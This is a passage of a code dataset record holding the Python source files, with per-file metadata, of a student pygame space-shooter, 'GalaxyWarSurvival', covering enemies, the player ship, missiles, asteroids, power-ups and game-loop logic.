self.posActual[0] = self.rect.x + self.velx\n self.rect.x = self.posActual[0]\n self.posActual[1] = self.rect.y + self.vely\n self.rect.y = self.posActual[1]\n" }, { "alpha_fraction": 0.558167576789856, "alphanum_fraction": 0.5798673629760742, "avg_line_length": 32.85714340209961, "blob_id": "66d6700e962e700d329bc3a844b4edcbadf1803d", "content_id": "f9c8deaadd5d92be423ca36a266dc9cdd761c3fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1660, "license_type": "no_license", "max_line_length": 80, "num_lines": 49, "path": "/models/enemigo2.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import utilidades as util\nfrom .enemigo_base import Enemigo_base\nfrom . 
import constantes\nimport random\nclass Enemigo2(Enemigo_base):\n def __init__(self,pos,direccion,agresividad):\n super().__init__(pos,direccion,agresividad)\n self.frame = 0\n self.animaciones = []\n self.fila_animacion = 0\n sabana = pygame.image.load(\"./Sprites/enemigos/SpriteEnemyBoomShip.png\")\n self.animaciones.append(util.recorte_imagen(sabana,[73,121],3))\n self.image = self.animaciones[self.fila_animacion][self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.atacando = False\n self.posy_inicial = pos[1]\n self.agresividad = agresividad\n self.type = \"enemigo2\"\n self.daño = 1500\n self.salud = 100\n self.puntos_impacto = 25\n self.puntos_destruir = 32\n\n def atacar(self):\n ataque=None\n if not(self.atacando):\n ataque = random.randint(0,self.agresividad)\n if(ataque == 0):\n self.velx = 0\n self.vely = 60\n self.atacando = True\n\n def comportamiento_limites(self):\n if(self.atacando):\n if(self.rect.y > constantes.ALTO) and(self.vely >0):\n self.vely = -1*self.vely\n if(self.rect.y == self.posy_inicial) and (self.vely < 0):\n self.vely = 0\n self.velx = 20\n self.atacando = False\n super().comportamiento_limites()\n\n def update(self):\n self.frame = util.animar(self.frame,3)\n self.atacar()\n super().update()\n" }, { "alpha_fraction": 0.6122961044311523, "alphanum_fraction": 0.6449184417724609, "avg_line_length": 31.310810089111328, "blob_id": "b76772226fd3c3bb1de1e37d57ebcd47edfb6189", "content_id": "ac16dbcf73b6a2523d86837a840af9aeca5c44c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2391, "license_type": "no_license", "max_line_length": 89, "num_lines": 74, "path": "/models/utilidades.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .enemigo2 import Enemigo2\nfrom .enemigo1 import Enemigo1\nfrom .asteroide1 import Asteroide1\nfrom . 
import constantes as con\n\ndef recorte_explosion(sabana,size,frames,filas):\n animacion = []\n for f in range(filas):\n for c in range(frames):\n cuadro = sabana.subsurface(size[0]*c,size[1]*f,size[0],size[1])\n animacion.append(cuadro)\n return animacion\n\ndef recorte_imagen(sabana,size,frames,filas=1):\n animacion = []\n if filas == 1:\n for c in range(frames):\n cuadro = sabana.subsurface(size[0]*c,0,size[0],size[1])\n animacion.append(cuadro)\n elif filas > 1:\n for f in range(filas):\n fila=[]\n for c in range(frames):\n cuadro = sabana.subsurface(size[0]*c,size[1]*f,size[0],size[1])\n fila.append(cuadro)\n animacion.append(fila)\n return animacion\n\ndef animar(frame_actual,numero_frames):\n if frame_actual < (numero_frames - 1):\n frame_actual = frame_actual + 1\n else:\n frame_actual = 0\n return(frame_actual)\n\ndef generar_enemigos(enemigos):\n for i in range(10):\n posx = random.randint(10,200)\n posy = random.randint(0,200)\n direccion = random.choice([-1,1])\n enemigo = Enemigo2([posx,posy],direccion,posy)\n enemigos.add(enemigo)\n for i in range(5):\n posx = random.randint(10,200)\n posy = random.randint(0,200)\n direccion = random.choice([-1,1])\n enemigo = Enemigo1([posx,posy],direccion,50)\n enemigos.add(enemigo)\n\ndef generar_asteroides(asteroides):\n asteroide = Asteroide1([50,-100])\n asteroides.add(asteroide)\n\ndef generar_modificador_balas(modif):\n modificadores = Modificador_b([50,-100])\n modificadores.add(modificadores)\n\ndef generar_modificador_naves(modif):\n modificadores = Modificador_n([50,-100])\n modificadores.add(modificadores)\n\ndef explosion_enemigos(ventana,pos):\n global animacion_muerte_enemigos\n frame = 0\n for repeticion in range(10):\n frame = animar(frame,6)\n ventana.blit(animacion_muerte_enemigos[frame],pos)\n pygame.display.flip()\n\n# sabana muerte enemigos\nsabana_muerte_enemigos = pygame.image.load(\"./Sprites/enemigos/SpriteEnemyExplosion.png\")\nanimacion_muerte_enemigos = recorte_imagen(sabana_muerte_enemigos,[90,80],6)\n" }, { "alpha_fraction": 0.4554140269756317, "alphanum_fraction": 0.6464968323707581, "avg_line_length": 15.526315689086914, "blob_id": "7c398f3cc3aac656e9815f41d13413ee059fb62e", "content_id": "0611282a2c83f1f8608c4a6ece93533c65448cf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 314, "license_type": "no_license", "max_line_length": 24, "num_lines": 19, "path": "/models/constantes.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "#Entorno del juego\nANCHO = 768\nALTO = 690\nZONA_JUEGO = 300\nVELOCIDAD_ENTORNO = 5\nNUMERO_FPS = 17\n#elementos de las clases\nVIDAS = 3\nDERECHA = -1\nIZQUIERDA = 1\n\n#Colores\nAZUL = [5,100,252]\nMORADO = [169,40,201]\nNEGRO = [0,0,0]\nBLANCO = [255,255,255]\nNARANJA = [235, 165, 14]\nROJO = [235, 14, 14]\nNEGRO = [0, 0 , 0]\n" }, { "alpha_fraction": 0.6120689511299133, "alphanum_fraction": 0.617241382598877, "avg_line_length": 31.22222137451172, "blob_id": "891dc4e409a49b024107a026f6e5b7ba6dcdcd95", "content_id": "8a27769eb6c75afbc041d1b0264af37e709e26c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 580, "license_type": "no_license", "max_line_length": 85, "num_lines": 18, "path": "/models/modificador_nave.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom .bloque_base import Bloque_base\nfrom . 
import constantes\n\nclass Modificador_n(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.image = pygame.image.load(\"./Sprites/modificadores/ModificadorNave.png\")\n self.rect = self.image.get_rect()\n self.velx = 0\n self.vely = constantes.VELOCIDAD_ENTORNO\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.type = \"modificador_nave\"\n\n def update(self):\n self.rect.y = self.rect.y + self.vely\n self.rect.x = self.rect.x + self.velx\n" }, { "alpha_fraction": 0.5737051963806152, "alphanum_fraction": 0.5896414518356323, "avg_line_length": 29.1200008392334, "blob_id": "d3263999e793d7c63c413cd901058a70f5cc65e4", "content_id": "badf7fff89259e9b6bbc50c3e16fca81ba570d85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 754, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/models/misil.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "from .bala_base import Bala_base\nfrom . import utilidades\nimport pygame\n\nclass Misil(Bala_base):\n\n def __init__(self,pos):\n super().__init__(pos)\n pos_x = self.rect.x\n pos_y = self.rect.y\n sabana = pygame.image.load(\"./Sprites/balas/SpritePlayerMisil_I.png\")\n self.animacion = utilidades.recorte_imagen(sabana,[19,88],3)\n self.frame = 0\n self.vely = -50\n self.image = self.animacion[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos_x\n self.rect.y = pos_y\n self.type = \"misil\"\n self.daño = 130\n\n def update(self):\n super().update()\n self.frame = utilidades.animar(self.frame,3)\n self.image = self.animacion[self.frame]\n" }, { "alpha_fraction": 0.6157965064048767, "alphanum_fraction": 0.6305220723152161, "avg_line_length": 31.478260040283203, "blob_id": "50a004803ad6ccd1854587e770de74795f87cc42", "content_id": "b19064d54678432de7d5cb9f0ec13615c3e753af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 747, "license_type": "no_license", "max_line_length": 78, "num_lines": 23, "path": "/models/agujero_negro.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .bloque_base import Bloque_base\nfrom . import ambiente\nfrom . import utilidades as util\n\nclass Agujero_negro(Bloque_base):\n def __init__(self,pos,direccion):\n super().__init__(pos)\n self.frame = 0\n sabana = pygame.image.load(\"./Sprites/bloques/SpriteAgujeroNegro.png\")\n self.animacion = util.recorte_imagen(sabana,[153,153],8)\n self.image = self.animacion[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.type = \"agujero\"\n self.direccion = direccion\n\n def update(self):\n self.frame = util.animar(self.frame,8)\n self.image = self.animacion[self.frame]\n super().update()\n" }, { "alpha_fraction": 0.605831503868103, "alphanum_fraction": 0.6177105903625488, "avg_line_length": 30.931034088134766, "blob_id": "c0a0faadeb2db38715d532b5aea2bb0bc29fbe8b", "content_id": "ccb7689d8475f722df6fad0fe9187d858060e3ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 926, "license_type": "no_license", "max_line_length": 87, "num_lines": 29, "path": "/models/generador_asteroides.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .bloque_base import Bloque_base\nfrom . import ambiente\nfrom . 
import constantes\n\nclass Generador_asteroides(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.image = pygame.image.load(\"./Sprites/generadores/generador_asteroide.png\")\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.vely = 0\n self.generando = False\n self.type = \"generado_asteroide\"\n\n def generar(self):\n generador = None\n if not(self.generando):\n generador = random.randint(0,50)\n if(generador == 0):\n ambiente.alarma_generar_asteroide = True\n pos_asteroide_generado = random.randint(20,constantes.ANCHO-20)\n ambiente.origen_asteroide = [pos_asteroide_generado,self.rect.y]\n\n def update(self):\n self.generar()\n super().update()\n" }, { "alpha_fraction": 0.5653451085090637, "alphanum_fraction": 0.5932452082633972, "avg_line_length": 29.954545974731445, "blob_id": "6ec0f765ea260ca2359e2d9ffef0adba1af5d4e6", "content_id": "14f21c7b33c56a50f978d5ffd63193db0e4b5aef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 682, "license_type": "no_license", "max_line_length": 72, "num_lines": 22, "path": "/models/asteroide1.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom .bloque_base import Bloque_base\nfrom . import constantes\n\nclass Asteroide1(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.image = pygame.image.load(\"./Sprites/bloques/Asteroid.png\")\n self.rect = self.image.get_rect()\n self.velx = 0\n self.vely = constantes.VELOCIDAD_ENTORNO + 20\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.type = \"asteroide\"\n self.daño = 2500\n self.salud = 1500\n self.puntos_impacto = 50\n self.puntos_destruir = 300\n\n def update(self):\n self.rect.y = self.rect.y + self.vely\n self.rect.x = self.rect.x + self.velx\n" }, { "alpha_fraction": 0.7407602667808533, "alphanum_fraction": 0.7624076008796692, "avg_line_length": 37.65306091308594, "blob_id": "15399415e4ccbadf9d50fdf5d4c33a57c6a83b63", "content_id": "877dbf1795b4930607997e110cd90a790974b4e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1894, "license_type": "no_license", "max_line_length": 89, "num_lines": 49, "path": "/models/variables.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . 
import utilidades\n#sprites groups\njugadores = pygame.sprite.Group()\nenemigos = pygame.sprite.Group()\nelementos_ambientales = pygame.sprite.Group()\nbalas_enemigos = pygame.sprite.Group()\nbalas_jugador = pygame.sprite.Group()\nsatelites = pygame.sprite.Group()\nmodificadores = pygame.sprite.Group()\nasteroides = pygame.sprite.Group()\ntipo_misil = \"misil\"\nestado_nave = 0\n\n#sonido\npygame.mixer.init()\nmusic_intro = pygame.mixer.Sound('./Sounds/Brave Pilots (Menu Screen).ogg')\nmusic_juego = pygame.mixer.Sound('./Sounds/Juego.ogg')\nmusic_out = pygame.mixer.Sound(\"./Sounds/Game Over.ogg\")\n\ndisparo = pygame.mixer.Sound('./Sounds/shoot.wav')\nexplosion_jugador = pygame.mixer.Sound('./Sounds/boom.wav')\n\nsound_Fireworks1 = pygame.mixer.Sound(\"./Sounds/Fireworks1.wav\")\nsound_Fireworks2 = pygame.mixer.Sound(\"./Sounds/Fireworks2.ogg\")\n\n#imagenes\nPantInit = pygame.image.load(\"./Sprites/fondos/Universe2PantInit.png\")\nLogoPantInit = pygame.image.load(\"./Sprites/fondos/Logo2PantInit.png\")\n\nsabana_game_over = pygame.image.load(\"./Sprites/fondos/SpriteGameOver.png\")\nGameOver = utilidades.recorte_imagen(sabana_game_over,[768,690],2)\n\nsabana_victoria = pygame.image.load(\"./Sprites/SpriteVictoria.png\")\nVictoria = utilidades.recorte_imagen(sabana_victoria,[768,690],2)\n\nfondo = pygame.image.load(\"./Sprites/Background.png\")\nsaba_puntos = pygame.image.load(\"./Sprites/Gui/Ambiente.png\")\nsabana_vidas = pygame.image.load(\"./Sprites/Gui/SpriteVidas.png\")\nsabana_salud = pygame.image.load(\"./Sprites/Gui/SpriteSalud.png\")\nsprite_salud = utilidades.recorte_imagen(sabana_salud,[80,30],6)\nsprite_vidas = utilidades.recorte_imagen(sabana_vidas,[116,30],3)\n\nsabana_muerte_enemigos = pygame.image.load(\"./Sprites/enemigos/SpriteEnemyExplosion.png\")\nanimacion_muerte_enemigos = utilidades.recorte_imagen(sabana_muerte_enemigos,[90,80],6)\n\n#otros\nreloj = pygame.time.Clock()\npos_fondo = -3450\n" }, { "alpha_fraction": 0.5717801451683044, "alphanum_fraction": 0.5898277163505554, "avg_line_length": 31.078947067260742, "blob_id": "4981cc3c03cdb5d2f8e0d922228f76a80ae02f66", "content_id": "a344fa274ffb0e667660c721849bccbafefa64e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1219, "license_type": "no_license", "max_line_length": 76, "num_lines": 38, "path": "/models/satelite.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom .bloque_base import Bloque_base\nfrom . import ambiente\nfrom . 
import constantes\n\nclass Satelite(Bloque_base):\n def __init__(self,pos):\n super().__init__(pos)\n self.image = pygame.image.load(\"./Sprites/generadores/Satelite.png\")\n self.rect = self.image.get_rect()\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.generando = 0\n self.type = \"satelite\"\n\n def cant_mod(self):\n cantidad = [30,90,120]\n if self.generando in cantidad:\n self.generando += 1\n return 0\n else:\n self.generando += 1\n return self.generando\n\n def generar(self):\n generador = self.cant_mod()\n if(generador == 0):\n ambiente.alarma_generar_modif_b = True\n ambiente.alarma_generar_modif_n = True\n pos_modif_n_generado = random.randint(20,constantes.ANCHO-20)\n pos_modif_b_generado = random.randint(20,constantes.ANCHO-20)\n ambiente.origen_modif_b = [pos_modif_b_generado,self.rect.y]\n ambiente.origen_modif_n = [pos_modif_n_generado,self.rect.y]\n\n def update(self):\n self.generar()\n super().update()\n" }, { "alpha_fraction": 0.5106970071792603, "alphanum_fraction": 0.5288129448890686, "avg_line_length": 35, "blob_id": "0451b5d362355e69b4cd68dd55760b9066ca894e", "content_id": "5dc2b01de540d9773bb3d6789554796f489d5165", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5796, "license_type": "no_license", "max_line_length": 142, "num_lines": 161, "path": "/models/jugador.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import utilidades as util\nfrom . import ambiente\nfrom . import constantes\nfrom .misil import Misil\nfrom .misil2 import Misil2\nfrom . import variables\n\nclass Jugador(pygame.sprite.Sprite):\n def __init__(self,pos):\n pygame.sprite.Sprite.__init__(self)\n self.animaciones = []\n self.explosion =[]\n self.vidas = 3\n self.salud = 1000\n self.puntos = 0\n self.estado = 0\n self.frame = 0\n self.pos_inicial = pos\n sabana1 = pygame.image.load(\"./Sprites/jugador/PlayerShipSprite_I.png\")\n sabana2 = pygame.image.load(\"./Sprites/jugador/PlayerShipSprite_II.png\")\n sabana3 = pygame.image.load(\"./Sprites/jugador/PlayerShipSprite_III.png\")\n sabana_explosion = pygame.image.load(\"./Sprites/jugador/PlayerShipExplosion.png\")\n self.animaciones.append(util.recorte_imagen(sabana1,[90,67],3))\n self.animaciones.append(util.recorte_imagen(sabana2,[80,85],3))\n self.animaciones.append(util.recorte_imagen(sabana3,[120,90],3))\n self.animaciones.append(util.recorte_imagen(sabana_explosion,[128,100],4))\n self.image = self.animaciones[self.estado][self.frame]\n self.rect = self.image.get_rect()\n self.velx = 0\n self.vely = 0\n self.speed = False\n self.rect.x = pos[0]\n self.rect.y = pos[1]\n self.repeticiones = 0\n\n def update(self):\n self.frame = util.animar(self.frame,3)\n self.cambio_animacion()\n self.control_limites()\n self.evaluar_vida()\n self.animacion_muerte()\n self.jugador_en_juego()\n self.rect.x = self.velx + self.rect.x\n self.rect.y = self.vely + self.rect.y\n\n def evaluar_vida(self):\n if self.salud <= 0:\n self.reproducir_sonido(\"boom\")\n self.frenar()\n self.estado = 3\n\n def control_limites(self):\n if(self.rect.left <= 0):\n self.velx=0\n self.rect.x = self.rect.x + 1\n if(self.rect.right >= constantes.ANCHO):\n self.velx = 0\n self.rect.x = self.rect.x - 1\n\n if(self.rect.top <= constantes.ZONA_JUEGO):\n self.vely = 0\n self.rect.y = self.rect.y + 1\n if(self.rect.bottom >= constantes.ALTO):\n self.vely = 0\n self.rect.y = self.rect.y - 1\n\n def controles(self,evento,lista_balas):\n if(evento.type == 
pygame.KEYDOWN):\n if(evento.key == pygame.K_s):\n self.speed = True\n if(evento.key == pygame.K_RIGHT):\n if self.speed:\n self.velx = 15 * (self.estado + 1)\n self.vely = 0\n else:\n self.velx = 5 * (self.estado + 1)\n self.vely = 0\n if(evento.key == pygame.K_LEFT):\n if self.speed:\n self.velx = -15 * (self.estado + 1)\n self.vely = 0\n else:\n self.velx = -5 * (self.estado + 1)\n self.vely = 0\n if(evento.key == pygame.K_UP):\n if self.speed:\n self.vely = -15 * (self.estado + 1)\n self.velx = 0\n else:\n self.vely = -5 * (self.estado + 1)\n self.velx = 0\n if(evento.key == pygame.K_DOWN):\n if self.speed:\n self.vely = 15 * (self.estado + 1)\n self.velx = 0\n else:\n self.vely = 5 * (self.estado + 1)\n self.velx = 0\n if(evento.key == pygame.K_d and not ambiente.alarma_planeta):\n origen_disparo = [self.rect.right-20,self.rect.y]\n self.disparar(lista_balas,origen_disparo,variables.tipo_misil)\n self.reproducir_sonido(\"bala\")\n if(evento.key == pygame.K_a and not ambiente.alarma_planeta):\n origen_disparo = [self.rect.left,self.rect.y]\n self.disparar(lista_balas,origen_disparo,variables.tipo_misil)\n self.reproducir_sonido(\"bala\")\n if evento.type == pygame.KEYUP:\n if(evento.key == pygame.K_UP) or (evento.key == pygame.K_DOWN) or (evento.key == pygame.K_RIGHT) or (evento.key == pygame.K_LEFT):\n self.frenar()\n if evento.key == pygame.K_s:\n self.speed = False\n\n def frenar(self):\n self.velx=0\n self.vely=0\n\n def disparar(self,lista_balas,origen_disparo,tipo_misil):\n if tipo_misil == \"misil\":\n bala = Misil(origen_disparo)\n else:\n bala = Misil2(origen_disparo)\n lista_balas.add(bala)\n\n def cambio_animacion(self):\n pos_x = self.rect.x\n pos_y = self.rect.y\n self.image = self.animaciones[self.estado][self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = pos_x\n self.rect.y = pos_y\n\n def reproducir_sonido(self,tipo):\n if tipo == \"bala\":\n variables.disparo.play()\n elif tipo == \"boom\":\n variables.explosion_jugador.play()\n\n\n def animacion_muerte(self):\n if(self.estado == 3):\n if(self.frame == 2 and self.repeticiones == 3):\n self.reiniciar()\n self.vidas -= 1\n elif(self.frame == 2):\n self.repeticiones += 1\n\n def reiniciar(self):\n self.salud = 1000\n self.estado = variables.estado_nave\n self.repeticiones = 0\n self.rect.x = self.pos_inicial[0]\n self.rect.y = self.pos_inicial[1]\n self.velx = 0\n self.vely = 0\n\n def jugador_en_juego(self):\n if(self.vidas > 0):\n pass\n else:\n ambiente.alarma_gameover = True\n" }, { "alpha_fraction": 0.6133027672767639, "alphanum_fraction": 0.6348623633384705, "avg_line_length": 35.63865661621094, "blob_id": "be56f2097b4c0a31403e5f62a2418d93a9966adf", "content_id": "7dff33f8ffd0157ba11207c61ca387ebe5b6f1c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8722, "license_type": "no_license", "max_line_length": 93, "num_lines": 238, "path": "/models/ambiente.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nfrom . import constantes\nfrom models.misil_enemigo import Misil_enemigo\nfrom . import utilidades as util\nfrom . 
import variables\nfrom .asteroide1 import Asteroide1\nfrom .modificador_balas import Modificador_b\nfrom .modificador_nave import Modificador_n\n\n#alarmas\nalarma_disparo_enemigo = False\nalarma_generar_modif_b = False\nalarma_generar_modif_n = False\nalarma_generar_asteroide = False\nalarma_gameover = False\nalarma_victoria = False\nalarma_planeta = False\norigen_modif_b = None\norigen_modif_n = None\norigen_disparo_enemigo = None\norigen_asteroide = None\n\n#sprites\nsabana_numeros = pygame.image.load(\"./Sprites/Gui/Numeros0a9.png\")\nnumeros = util.recorte_imagen(sabana_numeros,[14,19],10)\n\n#lista de enemigos para colisiones\nnombres_enemigos = [\"misil_enemigo\",\"asteroide\",\"enemigo1\",\"enemigo2\"]\nelementos_borrar = [\"asteroide\",\"agujero\",\"planeta\",\"satelite\"]\n\ndef ciclo_de_juego(ventana,elementos,jugador,niveles,enemigos,jugadores):\n evaluar_victoria(ventana,enemigos,jugador,jugadores,niveles)\n condicion_derrota(niveles,jugador)\n ventana.fill(constantes.NEGRO)\n cargar_gui(ventana,jugador)\n for elemento in elementos:\n elemento.draw(ventana)\n elemento.update()\n pygame.display.flip()\n variables.reloj.tick(constantes.NUMERO_FPS)\n\n# elementos de la victoria\nfirework1 = pygame.image.load(\"./Sprites/Firework.png\")\nfirework2 = pygame.image.load(\"./Sprites/Firework2.png\")\nsprite_firework1 = util.recorte_explosion(firework1,[256,256],6,5)\nsprite_firework2 = util.recorte_explosion(firework2,[83,60],10,7)\n\ndef evaluar_victoria(ventana,enemigos,jugador,jugadores,niveles):\n global alarma_victoria\n if (not enemigos) and (not alarma_victoria):\n variables.music_juego.stop()\n jugador.frenar()\n niveles[0] = False\n niveles[1] = False\n niveles[2] = True\n alarma_victoria = True\n\ndef animar_victoria(ventana):\n frame1 = 0\n frame2 = 0\n for repeat in range(30):\n frame1 = util.animar(frame1,30)\n ventana.blit(sprite_firework1[frame1],(12,230))\n pygame.display.flip()\n for repeticion in range(70):\n frame2 = util.animar(frame2,70)\n ventana.blit(sprite_firework2[frame2],(170,280))\n pygame.display.flip()\n\ndef condicion_derrota(niveles,jugador):\n if(alarma_gameover):\n jugador.tipo_misil = \"misil\"\n jugador.estado = 0\n jugador.puntos = 0\n niveles[0] = False\n niveles[1] = False\n niveles[2] = True\n\ndef cargar_gui(ventana,jugador):\n seleccionar_pos_fondo()\n ventana.blit(variables.fondo,[0,variables.pos_fondo])\n ventana.blit(variables.saba_puntos,[0,0])\n pos_sprite_salud = seleccionar_sprite_salud(jugador)\n ventana.blit(variables.sprite_salud[pos_sprite_salud],[constantes.ANCHO-80,0])\n ventana.blit(variables.sprite_vidas[jugador.vidas-1],[constantes.ANCHO-196,0])\n dibujar_puntos_jugador(ventana,jugador.puntos)\n\ndef seleccionar_sprite_salud(jugador):\n if(0 < jugador.salud < 430):\n return(4)\n elif(430 <= jugador.salud < 472):\n return(3)\n elif(472 <= jugador.salud < 715):\n return(2)\n elif(715 <= jugador.salud < 1000):\n return(1)\n else:\n return(0)\n\ndef seleccionar_pos_fondo():\n if(variables.pos_fondo == 0):\n variables.pos_fondo = -3450\n else:\n variables.pos_fondo = variables.pos_fondo + constantes.VELOCIDAD_ENTORNO\n\ndef protector_memoria(elementos):\n for elemento in elementos:\n for e in elemento:\n if e.type in elementos_borrar:\n if(e.rect.y > constantes.ALTO):\n elemento.remove(e)\n else:\n if(e.rect.bottom <= 0) or (e.rect.top > constantes.ALTO):\n elemento.remove(e)\n if(e.rect.x <= 0) or (e.rect.x > constantes.ANCHO):\n elemento.remove(e)\n\ndef controles(evento,nivel,en_juego,niveles,jugador=None,estado=None):\n global 
alarma_gameover\n if(evento.type == pygame.KEYDOWN):\n if nivel == 0:\n if (evento.key == pygame.K_SPACE):\n niveles[nivel]=False\n if (nivel==2):\n if (evento.key == pygame.K_SPACE):\n if(estado[0] == 0):\n en_juego[0] = False\n niveles[2] = False\n elif(estado[0] == 1):\n alarma_gameover = False\n jugador.vidas = 3\n niveles[0] = True\n niveles[1] = True\n niveles[2] = False\n if (evento.key == pygame.K_RIGHT):\n estado[0] = 1\n if (evento.key == pygame.K_LEFT):\n estado[0] = 0\n if evento.type == pygame.QUIT:\n en_juego[0] = False\n\ndef gestionar_disparo_enemigo(balas_enemigos):\n global origen_disparo_enemigo\n global alarma_disparo_enemigo\n if(alarma_disparo_enemigo == True):\n misil = Misil_enemigo(origen_disparo_enemigo)\n balas_enemigos.add(misil)\n alarma_disparo_enemigo=False\n\ndef gestionar_generacion_modific_Balas(modificadores):\n global origen_modif_b\n global alarma_generar_modif_b\n if(alarma_generar_modif_b == True):\n modificador_b = Modificador_b(origen_modif_b)\n modificadores.add(modificador_b)\n alarma_generar_modif_b = False\n\ndef gestionar_generacion_modific_naves(modificadores):\n global origen_modif_n\n global alarma_generar_modif_n\n if(alarma_generar_modif_n == True):\n modificador_n = Modificador_n(origen_modif_n)\n modificadores.add(modificador_n)\n alarma_generar_modif_n = False\n\ndef gestionar_generacion_asteroide(asteroides):\n global origen_asteroide\n global alarma_generar_asteroide\n if(alarma_generar_asteroide == True):\n asteroide = Asteroide1(origen_asteroide)\n asteroides.add(asteroide)\n alarma_generar_asteroide = False\n\ndef gestionar_colision_jugador(jugador,lista_elementos_colisionables):\n for lista_colisiones in lista_elementos_colisionables:\n colisiones = pygame.sprite.spritecollide(jugador,lista_colisiones,True)\n for colision in colisiones:\n if (colision.type in nombres_enemigos):\n jugador.salud -= colision.daño\n elif colision.type == \"modificador_bala\":\n variables.tipo_misil = \"misil2\"\n elif colision.type == \"modificador_nave\":\n jugador.estado = 1\n variables.estado_nave = 1\n\ndef gestionar_colision_enemigo(balas_jugador, lista_elementos_colisionables,jugador,ventana):\n for bala in balas_jugador:\n for lista_colisiones in lista_elementos_colisionables:\n colisiones = pygame.sprite.spritecollide(bala,lista_colisiones,False)\n for colision in colisiones:\n if colision.type in nombres_enemigos:\n if colision.type == \"misil_enemigo\":\n util.explosion_enemigos(ventana,colision.posActual)\n lista_colisiones.remove(colision)\n jugador.puntos += colision.puntos\n else:\n colision.salud -= bala.daño\n jugador.puntos += colision.puntos_impacto\n if(colision.salud <= 0):\n util.explosion_enemigos(ventana,colision.posActual)\n lista_colisiones.remove(colision)\n jugador.puntos += colision.puntos_destruir\n balas_jugador.remove(bala)\n\ndef dibujar_puntos_jugador(ventana,puntos):\n miles = puntos/1000\n centena = (puntos - ((int(puntos/1000))*1000))/100\n decena = (puntos % 100)/10\n unidad = decena % 10\n\n if int(miles) != 0:\n ventana.blit(numeros[int(miles)],[160,5])\n if int(centena) != 0 or miles > 0:\n ventana.blit(numeros[int(centena)],[177,5])\n if int(decena) != 0 or centena > 0 or miles > 0:\n ventana.blit(numeros[int(decena)],[194,5])\n\n ventana.blit(numeros[int(unidad)],[211,5])\n pygame.display.flip()\n\ndef gestionar_elementos_ambientales(jugador,elementos_ambientales):\n for elemento in elementos_ambientales:\n if(elemento.type == \"agujero\"):\n logica_agujero_negro(elemento,jugador)\n if(elemento.type == 
\"planeta\"):\n logica_planeta(elemento)\n\ndef logica_agujero_negro(elemento,jugador):\n if(0 < elemento.rect.y < constantes.ALTO):\n if(elemento.rect.top< jugador.rect.y < elemento.rect.bottom):\n jugador.velx = 5*elemento.direccion\n\ndef logica_planeta(elemento):\n global alarma_planeta\n if(0 < elemento.rect.y < constantes.ALTO):\n alarma_planeta = True\n else:\n alarma_planeta = False\n" }, { "alpha_fraction": 0.6359349489212036, "alphanum_fraction": 0.6540910005569458, "avg_line_length": 41.838382720947266, "blob_id": "88017eef87c059364553c82691fa27e060506d59", "content_id": "fdf3f1825c86542bf0181049bbb677ef51097465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4241, "license_type": "no_license", "max_line_length": 138, "num_lines": 99, "path": "/GalaxyWarSurvival.py", "repo_name": "jgamer42/proyecto_compugrafica", "src_encoding": "UTF-8", "text": "import pygame\nimport random\nfrom models import ambiente\nfrom models import constantes\nfrom models import utilidades\nfrom models.jugador import Jugador\nfrom models.enemigo1 import Enemigo1\nfrom models.enemigo2 import Enemigo2\nfrom models.asteroide1 import Asteroide1\nfrom models.generador_asteroides import Generador_asteroides\nfrom models.satelite import Satelite\nfrom models.modificador_balas import Modificador_b\nfrom models.modificador_nave import Modificador_n\nfrom models.agujero_negro import Agujero_negro\nfrom models.planeta import Planeta\nfrom models.variables import *\n\nif __name__ == \"__main__\":\n pygame.init()\n pygame.mixer.init()\n ventana = 